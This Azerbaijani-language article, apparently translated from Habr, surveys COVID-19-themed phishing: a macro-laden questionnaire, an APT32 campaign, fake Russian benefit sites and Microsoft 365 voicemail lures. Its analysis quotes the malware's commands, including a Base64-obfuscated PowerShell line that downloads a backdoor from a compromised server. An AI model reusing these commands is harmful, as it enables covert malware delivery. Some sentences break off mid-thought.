Hücumçular COVID-19 mövzusundan istifadə etməyə davam edərək epidemiya ilə bağlı hər şeylə maraqlanan istifadəçilər üçün getdikcə daha çox təhlükə yaradırlar. IN
Yadda saxla
COVID-19 üçün ödənişsiz sınaqdan keçmək istərdinizmi?
Koronavirus temalı fişinqin başqa bir əhəmiyyətli nümunəsi idi
Əksər istifadəçiləri makroları aktivləşdirməyə inandırmaq da asan idi. Bunun üçün standart bir hiylə istifadə edildi: anketi doldurmaq üçün əvvəlcə makroları aktivləşdirməlisiniz, yəni VBA skriptini işə salmalısınız.
Gördüyünüz kimi, VBA skripti antiviruslardan xüsusi olaraq maskalanıb.
Windows-un defolt “Bəli” cavabını qəbul etməzdən əvvəl proqramın /T <saniyə> gözlədiyi bir gözləmə funksiyası var. Bizim vəziyyətimizdə skript müvəqqəti faylları silməzdən əvvəl 65 saniyə gözlədi:
cmd.exe /C choice /C Y /N /D Y /T 65 & Del C:UsersPublictmpdirtmps1.bat & del C:UsersPublic1.txt
Və gözləyərkən zərərli proqram yükləndi. Bunun üçün xüsusi PowerShell skripti işə salındı:
cmd /C powershell -Command ""(New-Object Net.WebClient).DownloadFile([System.Text.Encoding]::ASCII.GetString([System.Convert]: :FromBase64String('aHR0cDovL2F1dG9tYXRpc2NoZXItc3RhdWJzYXVnZXIuY29tL2ZlYXR1cmUvNzc3Nzc3LnBuZw==')), [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('QzpcVXNlcnNcUHVibGljXHRtcGRpclxmaWxl')) + '1' + '.e' + 'x' + 'e') >C:UsersPublic1.txt
Base64 dəyərinin şifrəsini açdıqdan sonra PowerShell skripti Almaniyadan əvvəllər sındırılmış veb serverdə yerləşən arxa qapını yükləyir:
http://automatischer-staubsauger.com/feature/777777.png
və adı altında saxlayır:
C:UsersPublictmpdirfile1.exe
Qovluq ‘C:UsersPublictmpdir’
əmrini ehtiva edən 'tmps1.bat' faylı işlədərkən silinir cmd /c mkdir ""C:UsersPublictmpdir"".
Dövlət orqanlarına məqsədyönlü hücum
Bundan əlavə, FireEye analitikləri bu yaxınlarda Vuhandakı hökumət strukturlarına, eləcə də Çin Fövqəladə İdarəetmə Nazirliyinə yönəlmiş APT32 hücumu barədə məlumat verdilər. Yayılan RTF-lərdən birində New York Times məqaləsinə keçid var idi
Maraqlıdır ki, aşkarlanma zamanı antivirusların heç biri bu nümunəni aşkar etməyib, Virustotal-a görə.
Rəsmi saytlar işləmədikdə
Fişinq hücumunun ən parlaq nümunəsi ötən gün Rusiyada baş verib. Buna səbəb 3 yaşdan 16 yaşa qədər uşaqlar üçün çoxdan gözlənilən müavinətin təyin edilməsi olub. 12 may 2020-ci il tarixində müraciətlərin qəbuluna başlanıldığı elan edildikdə, milyonlarla insan çoxdan gözlənilən yardım üçün Dövlət Xidmətlərinin saytına axışdı və portalı peşəkar DDoS hücumundan daha pis bir şəkildə sıradan çıxardı. Prezident “Dövlət xidmətləri müraciət axınının öhdəsindən gələ bilmir” deyəndə insanlar onlayn müraciətlərin qəbulu üçün alternativ saytın işə salınmasından danışmağa başladılar.
Problem ondadır ki, bir neçə sayt eyni anda işləməyə başladı və biri, posobie16.gosuslugi.ru saytındakı real, ərizələri həqiqətən qəbul edir, daha çox
SearchInform-dan olan həmkarlar .ru zonasında 30-a yaxın yeni saxta domen aşkar ediblər. “Infosecurity” və “Softline” şirkəti aprelin əvvəlindən bəri 70-dən çox analoji saxta dövlət xidmətinin internet saytlarını izləyib. Onların yaradıcıları tanış simvollarla manipulyasiya edir, həmçinin gosuslugi, gosuslugi-16, vyplaty, covid-vyplaty, posobie və s. söz birləşmələrindən istifadə edirlər.
Hype və sosial mühəndislik
Bütün bu nümunələr yalnız təcavüzkarların koronavirus mövzusundan uğurla pul qazandığını təsdiqləyir. Sosial gərginlik və aydın olmayan məsələlər nə qədər yüksək olarsa, fırıldaqçıların mühüm məlumatları oğurlamaq, insanları öz pullarından imtina etməyə məcbur etmək və ya sadəcə olaraq daha çox kompüteri sındırmaq şansları bir o qədər çox olur.
Pandemiyanın potensial olaraq hazırlıqsız insanları kütləvi şəkildə evdən işləməyə məcbur etdiyini nəzərə alsaq, təkcə şəxsi deyil, həm də korporativ məlumatlar risk altındadır. Məsələn, bu yaxınlarda Microsoft 365 (əvvəllər Office 365) istifadəçiləri də fişinq hücumuna məruz qalıblar. İnsanlar məktublara əlavə olaraq kütləvi “buraxılmış” səsli mesajlar alırdılar. Bununla belə, fayllar əslində hücum qurbanlarını göndərən bir HTML səhifəsi idi
Mənbə: www.habr.com